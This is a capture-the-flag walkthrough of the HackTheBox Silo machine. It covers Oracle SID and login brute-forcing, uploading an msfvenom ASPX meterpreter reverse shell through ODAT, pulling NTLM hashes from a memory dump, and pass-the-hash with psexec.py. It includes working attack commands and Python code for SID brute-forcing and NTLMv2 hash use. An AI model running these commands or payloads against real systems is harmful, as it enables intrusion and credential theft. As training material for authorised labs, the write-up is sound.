We covered Oracle Database exploitation with the Metasploit Framework and the Oracle Database Attacking Tool (ODAT) as part of Pwn with Metasploit from HackTheBox. This was part of the HackTheBox Silo machine.

Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools; however, ODAT greatly simplifies the process and reduces the difficulty of the machine substantially.

Initial Reconnaissance and Enumeration

I started by running an Nmap scan on the target machine. This scan revealed two open ports:

  • Port 80: Microsoft IIS (Internet Information Services), which told me the target was a Windows Server. It served only the default IIS page, with nothing immediately exploitable.
  • Port 1521: an Oracle TNS listener, which became my primary target.

Oracle Database Enumeration with Metasploit

My focus then shifted to enumerating the Oracle database using Metasploit.

First, I needed the SID (System Identifier) of the Oracle instance, because the listener only accepts connections that name a SID (or service name) it knows. I ran search tns in Metasploit to find the relevant modules and selected auxiliary/admin/oracle/oracle_sid_brute. After setting the target IP (set RHOSTS 10.10.10.56), I ran the module. It identified “XE” as a valid SID, which I used for the next steps.

Next, I brute-forced the database login. search oracle_login turned up auxiliary/scanner/oracle/oracle_login; I set the target IP (set RHOSTS 10.10.10.56) and the SID (set SID XE) and ran it. The module succeeded, revealing the well-known default Oracle sample-schema credentials: username “scott” and password “tiger”.
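To show what the SID brute-force module actually does on the wire, here is an added example (my own code, not the page's and not a Metasploit module): it builds the TNS CONNECT packet for one SID guess and classifies the listener's reply, which is how a valid SID is told apart from an unknown one. The target 10.10.10.56 and the SID XE come from the walkthrough; the listener replies are constructed in-code, so a fake listener stands in for port 1521 and the script runs offline.

```python
import re
import struct

# TNS packet type byte (offset 4 of the 8-byte header)
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
CONNECT_DATA_OFFSET = 58  # 8-byte header + 50 bytes of CONNECT fields


def tns_connect_packet(sid: str, host: str, port: int = 1521) -> bytes:
    """Build the TNS CONNECT packet a client sends to the listener to reach one SID.
    Field layout matches what the Metasploit TNS mixin and nmap's tns library send."""
    connect_data = (
        "(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))"
        "(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))" % (sid, host, port)
    ).encode()
    fields = struct.pack(
        ">HHHHHHHHHHIBB",
        0x0136, 0x012C,          # protocol version 310, lowest compatible version 300
        0x0000, 0x0800, 0x7FFF,  # service options, SDU 2048, TDU 32767
        0x7F08, 0x0000, 0x0001,  # NT protocol characteristics, max pkts before ack, byte-order marker
        len(connect_data), CONNECT_DATA_OFFSET,
        0,                       # max receivable data
        1, 1,                    # ANO flags
    ) + bytes(24)                # trace cross-facility items, unique connection id, reserved
    total = 8 + len(fields) + len(connect_data)
    header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)  # length, checksum, type, reserved, hdr checksum
    return header + fields + connect_data


def classify_tns_reply(reply: bytes):
    """Map the listener's reply to a verdict for the SID that was tried.
    Returns (verdict, ora_code); ora_code is the ORA- number carried in a REFUSE."""
    if len(reply) < 8:
        return ("short", None)
    pkt_type = reply[4]
    if pkt_type in (TNS_ACCEPT, TNS_REDIRECT):
        return ("valid-sid", None)          # listener will route us to that instance
    if pkt_type == TNS_RESEND:
        return ("resend", None)             # listener wants the CONNECT sent again; not a verdict
    if pkt_type == TNS_REFUSE:
        # REFUSE body: reason_user(1) reason_system(1) data_len(2) then the error string
        m = re.search(rb"\(ERR=(\d+)\)", reply[12:])
        code = int(m.group(1)) if m else None
        if code in (12505, 12514):          # listener does not know this SID / service name
            return ("unknown-sid", code)
        return ("refused", code)            # e.g. 12516/12518: the SID exists but no handler is free
    return ("other", None)


def make_refuse(ora_code: int) -> bytes:
    """Constructed REFUSE packet in the shape a listener returns for an unknown SID."""
    text = (b"(DESCRIPTION=(TMP=)(VSNNUM=186647296)(ERR=%d)"
            b"(ERROR_STACK=(ERROR=(CODE=%d)(EMFI=4))))" % (ora_code, ora_code))
    body = struct.pack(">BBH", 0x22, 0x00, len(text)) + text
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_REFUSE, 0, 0) + body


def make_accept() -> bytes:
    """Constructed minimal ACCEPT packet; only the header type matters to the classifier."""
    return struct.pack(">HHBBH", 24, 0, TNS_ACCEPT, 0, 0) + bytes(16)


def fake_listener(pkt: bytes) -> bytes:
    """Constructed stand-in for 10.10.10.56:1521: knows only SID XE, refuses everything else."""
    m = re.search(rb"\(SID=([^)]*)\)", pkt[CONNECT_DATA_OFFSET:])
    return make_accept() if m and m.group(1) == b"XE" else make_refuse(12505)


def brute_sids(candidates, send_connect, host="10.10.10.56"):
    """What a SID brute-forcer does per wordlist entry. send_connect(packet) -> reply bytes;
    in real use that is a fresh TCP socket to port 1521, here it is fake_listener."""
    found = []
    for sid in candidates:
        verdict, _ = classify_tns_reply(send_connect(tns_connect_packet(sid, host)))
        if verdict == "valid-sid":
            found.append(sid)
    return found


if __name__ == "__main__":
    print(brute_sids(["ORCL", "XE", "PROD", "PLSExtProc"], fake_listener))
```

The point worth keeping in mind from the classifier: a REFUSE is not always a miss. ORA-12505 means the listener has no instance by that name, but other refusal codes (a handler that cannot accept right now, for example) mean the name is real, so a brute-forcer that only keys on ACCEPT will under-report.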

Generating and Uploading a Reverse Shell

With the credentials in hand, my plan was to upload a reverse shell.

Because the target was a Windows server running IIS, I generated an ASPX payload with msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4545 -f aspx -o shell.aspx.

I then started a listener in a second msfconsole instance with exploit/multi/handler, set the payload to windows/x64/meterpreter/reverse_tcp to match the msfvenom payload, configured the listener's IP (set LHOST <your_ip>) and port (set LPORT 4545), and ran it.

To upload the shell, I used ODAT (Oracle Database Attacking Tool). Its dbmsxslprocessor module abuses the DBMS_XSLPROCESSOR.CLOB2FILE procedure to write an arbitrary file on the database host; writing to disk this way needs DBA-level rights, so the connection is made with --sysdba (if the listener rejects that, the account lacks the privilege). After installing ODAT, I ran: python3 odat.py dbmsxslprocessor -s 10.10.10.56 -d XE -U scott -P tiger --sysdba --putFile "C:\inetpub\wwwroot" "shell.aspx" "/root/odat/shell.aspx". The three --putFile arguments are the remote directory, the remote file name and the local file. This wrote shell.aspx into the IIS webroot.

Gaining Initial Access and Finding User Flag

I requested the uploaded file in a browser at http://10.10.10.56/shell.aspx. IIS executed the ASPX page, the payload connected back, and I had a Meterpreter session.

From the Meterpreter session, I dropped into a system shell with the shell command, navigated to C:\Users, listed it and found the user's directory. Inside it I displayed the user flag with type user.txt. The same directory also held a note.txt file, which contained a Dropbox link and a password hint for a memory dump file.

Privilege Escalation using Memory Dump and Volatility

The Dropbox link led to a memory dump of about 1 GB. My next step was to analyze it with Volatility to extract the Administrator account's NTLM hash.

I used volatility -f memory.dmp --profile=Win2012R2x64 hivelist to list the registry hives present in memory and note the virtual offsets of the SYSTEM and SAM hives (if the profile is uncertain, volatility -f memory.dmp imageinfo suggests one). Then volatility -f memory.dmp --profile=Win2012R2x64 hashdump -y <system_hive_offset> -s <sam_hive_offset> decrypts the SAM with the boot key from SYSTEM and prints one line per local account in the form user:rid:LM:NT:::, including the Administrator account's NT hash.

Gaining Root Access (Pass the Hash)

With the Administrator's NTLM hash, I used psexec.py from Impacket to pass the hash. I changed into the examples directory (cd /usr/share/doc/python3-impacket/examples/) and ran: python3 psexec.py -hashes <lm_hash>:<nt_hash> administrator@10.10.10.56. The -hashes value is LM:NT; when no LM hash is stored, hashdump prints the empty-LM value aad3b435b51404eeaad3b435b51404ee in that position, and that is what goes before the colon.

This gave me a shell as NT AUTHORITY\SYSTEM, since psexec.py installs and starts a service binary on the target, which runs with SYSTEM privileges. I confirmed that with whoami, then navigated to the Administrator's desktop (cd C:\Users\Administrator\Desktop) and displayed the root flag with type root.txt.
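As an added example of why the hash alone is enough (my own code, not the page's and not Impacket's): the NT hash is MD4 over the UTF-16LE password, and an NTLMv2 authentication response is computed from that hash, the user and domain names, and values the server and client exchange in the clear, so a client holding only the hash produces exactly the response a client holding the password would. The hashdump line, server challenge, timestamp and client nonce below are constructed; the Administrator name and the LM:NT form of -hashes match the walkthrough, and SILO as the domain field is an assumption (a local account uses the machine name there). MD4 is implemented inline because hashlib's md4 is often disabled under OpenSSL 3.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three 16-step rounds over 512-bit blocks, little-endian words."""
    msg = bytearray(data) + b"\x80"
    msg += bytes((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                  # round 1: F = (b & c) | (~b & d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                  # round 2: G = majority
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                  # round 3: H = xor
            k = int(format(i, "04b")[::-1], 2)
            a = _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash the SAM stores and hashdump prints: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def hashes_arg(hashdump_line: str) -> str:
    """'user:rid:LM:NT:::' from hashdump -> the LM:NT string psexec.py -hashes expects."""
    _, _, lm, nt = hashdump_line.strip().split(":")[:4]
    return "%s:%s" % (lm, nt)


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure the client builds: version bytes, FILETIME, client nonce, AV pairs."""
    return b"\x01\x01" + bytes(6) + struct.pack("<Q", timestamp) + client_challenge + bytes(4) + target_info + bytes(4)


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 NtChallengeResponse (MS-NLMP 3.3.2): NTProofStr || blob. Every input is either
    public on the wire or the NT hash itself; the password never enters, hence pass-the-hash."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    nt_proof = hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def pass_the_hash_demo():
    """Constructed scenario: a hashdump line for a local Administrator whose password happens
    to be 'password', plus a server challenge and blob as seen in an SMB session setup.
    Returns (the -hashes argument, whether hash-only and password-based responses agree)."""
    line = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:%s:::" % nt_hash("password").hex()
    lm_nt = hashes_arg(line)                                  # what you pass to psexec.py -hashes
    stolen_nt = bytes.fromhex(lm_nt.split(":")[1])            # the attacker holds only this
    server_challenge = bytes.fromhex("0123456789abcdef")     # constructed 8-byte nonce
    blob = ntlmv2_blob(0x01D9A1B2C3D4E5F6, bytes.fromhex("aabbccddeeff0011"), bytes(4))
    with_hash = ntlmv2_response(stolen_nt, "Administrator", "SILO", server_challenge, blob)
    with_password = ntlmv2_response(nt_hash("password"), "Administrator", "SILO", server_challenge, blob)
    return lm_nt, with_hash == with_password


if __name__ == "__main__":
    print(pass_the_hash_demo())
```

The check this gives you before running psexec.py is cheap: if the NT field you extracted is 32 hex characters and the LM field is the empty-LM value, the -hashes argument is well formed; if the NT field is 31d6cfe0d16ae931b73c59d7e0c089c0 (MD4 of the empty string) the account has no password and the hash is not worth much.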

I successfully gained root access to the Silo machine! 🎉

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.